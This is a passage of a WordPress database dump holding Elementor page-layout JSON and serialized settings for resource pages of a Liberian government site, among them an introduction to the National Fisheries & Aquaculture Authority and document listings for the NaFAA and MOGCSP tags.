More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e54ec5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d6bc921\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"70ac5b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0e5b35e\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:nafaa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18019,2654,'_elementor_edit_mode','builder'),(18020,2654,'_elementor_template_type','wp-post'),(18021,2654,'_elementor_version','2.7.5'),(18022,2654,'_wp_page_template','default'),(18023,2654,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.<\\/p>\\n<p>The overall fisheries sector goal is: Sustainably managed and economically viable fisheries that generate prosperity for the present and generations yet unborn.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db49c3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"793fd76\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e046628\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48352ba\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"nafaa\\\",\\\"tag_id\\\":\\\"65\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"nafaa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e54ec5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d6bc921\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"70ac5b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0e5b35e\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:nafaa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18024,1588,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18025,2655,'_elementor_edit_mode','builder'),(18026,2655,'_elementor_template_type','wp-post'),(18027,2655,'_elementor_version','2.7.5'),(18028,2655,'_wp_page_template','default'),(18029,2655,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c512178\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The MODCSP information coming soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"20a8d07\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e84457\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"532f56d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"57f59e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b007c95\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1a78d5f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"532f56d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"f0efc77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a13897\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(18032,2656,'_elementor_edit_mode','builder'),(18033,2656,'_elementor_template_type','wp-post'),(18034,2656,'_elementor_version','2.7.5'),(18035,2656,'_wp_page_template','default'),(18036,2656,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c512178\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The MODCSP information coming soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1a78d5f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"532f56d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"f0efc77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a13897\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a4db5a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"38bc81c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"17482a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ae03a19\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mogcsp\\\",\\\"tag_id\\\":\\\"64\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mogcsp\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7758e3b1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"766d660a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a4a49d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a94bfb8\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mogcsp\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18037,1584,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\